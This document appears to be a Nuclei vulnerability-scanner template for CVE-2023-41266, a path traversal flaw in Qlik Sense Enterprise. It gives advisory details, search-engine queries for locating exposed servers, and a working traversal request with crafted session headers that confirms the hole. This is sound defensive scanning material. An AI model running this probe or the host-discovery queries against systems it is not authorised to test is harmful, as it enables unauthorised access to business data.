id: CVE-2023-41266

info:
  name: Qlik Sense Enterprise - Path Traversal
  author: AdamCrosser
  severity: medium
  description: A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
  impact: |
    Unauthenticated attackers can exploit path traversal to generate anonymous sessions and access unauthorized API endpoints, potentially extracting sensitive business intelligence data and manipulating Qlik Sense dashboards.
  remediation: |
    Update Qlik Sense Enterprise to August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, or August 2022 Patch 13 that properly validates resource paths and enforces authentication.
  reference:
    - https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801
    - https://www.praetorian.com/blog/advisory-qlik-sense/
    - https://www.praetorian.com/blog/qlik-sense-technical-exploit
    - https://community.qlik.com/t5/Release-Notes/tkb-p/ReleaseNotes
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-41266
    cwe-id: CWE-20
    epss-score: 0.9422
    epss-percentile: 0.99927
    cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qlik
    product: qlik_sense
    framework: windows
    shodan-query:
      - http.favicon.hash:-74348711
      - http.html:"qlik"
      - http.title:"qlik-sense"
    fofa-query:
      - app="qlik-sense"
      - title="qlik-sense"
      - icon_hash=-74348711
      - body="qlik"
    google-query: intitle:"qlik-sense"
  tags: cve2023,cve,qlik,traversal,kev,windows,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"
    headers:
      Cookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337
      X-Qlik-Xrfkey: '1333333333333337'

    matchers:
      - type: dsl
        dsl:
          - status_code == 400
          - contains(to_lower(set_cookie), 'x-qlik-session')
          - contains(body, 'The comparison expression does not consist of three elements')
        condition: and
# digest: 4b0a00483046022100ea3ddf0dbddd15b7e0806bb2a32ad566fc5614cf1ace959babbce0ec4af3e39c022100f36dbb572fad1a16267149605bbd7b5b120c8e5e604e8f743d496e97cbc26b6f:922c64590222798bb761d5b6d8e72950